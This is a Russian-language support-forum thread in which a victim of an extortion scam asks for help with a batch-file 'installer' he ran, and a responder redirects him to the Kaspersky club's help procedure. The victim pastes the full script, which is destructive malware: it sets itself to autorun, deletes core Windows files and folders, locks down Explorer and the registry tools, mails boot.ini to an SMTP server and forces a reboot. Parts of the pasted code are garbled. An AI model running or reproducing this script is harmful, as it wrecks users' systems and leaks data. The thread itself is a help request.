Иван5 Posted April 12 Posted April 12 1. Windows 10 версии 22H2(Пиратка) 2. Kaspersky Total Security 21.24(неактивен) Здравствуйте. Я веду небольшой блог по прохождению известных и малоизвестных игр. В связи с этим мне пишут некоторые разработчики со своими проектами. На этой почве ко мне втерлись в доверие хакеры. Они отправили мне батник с установкой непонятно чего, после запуска которого, как заверил главный мошенник происходят необратимые изменения в самом UEFI материнки. Почитал на сайтах, способа 2- перепрошить материнку программатором, либо купить новую. Денег нет совсем. Мошенники обещали "таблетку" за доступ к тг каналу и чату. Прилагаю код инсталлера и приложу все что попросите, увы сам Фаил вируса не дает прикрепить( скачать безопасно, не безопасно запускать installer) для изучения. Заплачу чем смогу, если кто-то реально объяснит проблему и напишет свою таблетку. Windows 10. Пиратка. Прилагаю скриншоты самого вируса и автозапуска в диспетчере задач(только фото есть, извините, пришлось на время решения проблемы лишить хакеров доступа к моему компу и отключить интернет) Текст батника-инсталлера: Спойлер @echo This app created by Niziast @echo Niziast App @echo Autor: Niziast, app created by Niziast @echo off echo Chr(39)>%temp%\temp1.vbs echo Chr(39)>%temp%\temp2.vbs echo on error resume next > %temp%\temp.vbs echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs reg add HKEYERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USEUSERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0 copy %¶§% %SystemRoot%\user32dll.bat reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REGD /d 67108863 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORDDWORD /d 67108863 /f echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Featureachine_LockdowLockdown" /v "IExplorer" /d 0 /f reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs echo sr=s.RegRead("HKEYCHINE\SMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs echo sr=s.RegRead("HKEYINE\SOFMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs echo sr=s.RegRead("HKEYE\SOFTWMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs echo s.regwrite "HKEYLSID\{645ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","NIZIAST">>%temp%\temp.vbs echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","NIZIAST">>%temp%\temp.vbs echo on error resume next > %temp%\temp1.vbs echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs echo do>>%temp%\temp1.vbs echo fso.getfile ("A:\")>>%temp%\temp1.vbs echo loop>>%temp%\temp1.vbs echo on error resume next > %temp%\temp2.vbs echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs echo do>>%temp%\temp2.vbs echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs echo loop>>%temp%\temp2.vbs reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REGeg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f reDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f reg DWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REGdd "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f reg adDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f reg add DWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REGhkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f reg add "hDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REGcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f reg add "hkcDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f reg add "hkcu\DWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REGoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f reg add "hkcu\SoDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REGtware\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f reg add "hkcu\SoftDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REGare\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f reg add "hkcu\SoftwaDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REGe\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f reg add "hkcu\SoftwareDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REGMicrosoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f reg add "hkcu\Software\MDWORD /d 1 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REGteobject("shell.application")>>%temp%\temp.vbs echo application.minimizeall>>%temp%\temp.vbs reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /fSZ /d rundll32 user32, SwapMouseButton /f start rundll32 user32, SwapMouseButton reg add "HKCR\exefile\shell\open\command" /ve /t REG\temp.vbs echo while i^>0 or i^<0 >> %temp%\temp.vbs echo S.popup "NIZIAST",0, "NIZIAST",0+16 >> %temp%\temp.vbs echo i=i-1 >> %temp%\temp.vbs echo wend >> %temp%\temp.vbs echo do >> %temp%\temp.vbs echo wscript.sleep 200 >> %temp%\temp.vbs echo s.sendkeys"{capslock}" >> %temp%\temp.vbs echo wscript.sleep 200 >> %temp%\temp.vbs echo s.sendkeys"{numlock}" >> %temp%\temp.vbs echo wscript.sleep 200 >> %temp%\temp.vbs echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs echo loop>> %temp%\temp.vbs echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs echo colCDROMs.Item(i).eject >> %temp%\temp.vbs echo next >> %temp%\temp.vbs echo End If >> %temp%\temp.vbs echo Call SendPost("NIZIAST", "NIZIAST", "NIZIAST", "...", "NIZIAST") >> %temp%\temp.vbs echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs echo Set Flds = iConf.Fields >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs echo Flds.Update >> %temp%\temp.vbs echo iMsg.Configuration = iConf >> %temp%\temp.vbs echo iMsg.To = strTo >> %temp%\temp.vbs echo iMsg.From = strFrom >> %temp%\temp.vbs echo iMsg.Subject = strSubject >> %temp%\temp.vbs echo iMsg.TextBody = strBody >> %temp%\temp.vbs echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs echo iMsg.Send >> %temp%\temp.vbs echo End Function >> %temp%\temp.vbs echo Set iMsg = Nothing >> %temp%\temp.vbs echo Set iConf = Nothing >> %temp%\temp.vbs echo Set Flds = Nothing >> %temp%\temp.vbs echo s.run "shutdown -r -t 0 -c ""NIZIAST"" -f",1 >> %temp%\temp.vbs start %temp%\temp.vbs start %temp%\temp1.vbs start %temp%\temp2.vbs Пожалуйста, кто-нибудь ответьте или посоветуйте к кому конкретно лучше обратиться, боюсь тут мне не помогут
andrew75 Posted April 12 Posted April 12 3 часа назад, Иван5 сказал: после запуска которого, как заверил главный мошенник происходят необратимые изменения в самом UEFI материнки а вы больше верьте мошенникам. Там все изменения делаются в системе. Никаких изменений UEFI и близко нет. Что сейчас с системой конкретно?
Иван5 Posted April 12 Author Posted April 12 20 минут назад, andrew75 сказал: а вы больше верьте мошенникам. Там все изменения делаются в системе. Никаких изменений UEFI и близко нет. Что сейчас с системой конкретно? Сейчас я отключил проводной интернет, система загружается, но напрягает что мне в телеграмм в группах которые я состою смог написать мошенник, т.е. видит в каких я группах. Если можно обойтись обычной переустановкой винды, я только рад. Но так как сам не разбираюсь в скриптах хочу убедиться в этом. Нейросеть тоже считает что заражения UEFI не было и это манипулятивная уловка. Кроме того вирусы для заражения UEFI очень дорогие, а мой "хакер" явно не из богачей. Также сам мошенник вымогает именно доступ к моему тг каналу, от чего я делаю вывод, что он только видит группы но ничего от моего лица не может сделать, иначе бы он просто присвоил себе админ права. Еще на диске C уменьшается свободное место. И я не понимаю почему. Утром было почти 100гб свободного, сейчас 20
Solution andrew75 Posted April 12 Solution Posted April 12 Создайте тему на форуме Клуба лаборатории Касперского, выполнив порядок оформления запроса о помощи.
Recommended Posts
Please sign in to comment
You will be able to leave a comment after signing in
Sign In Now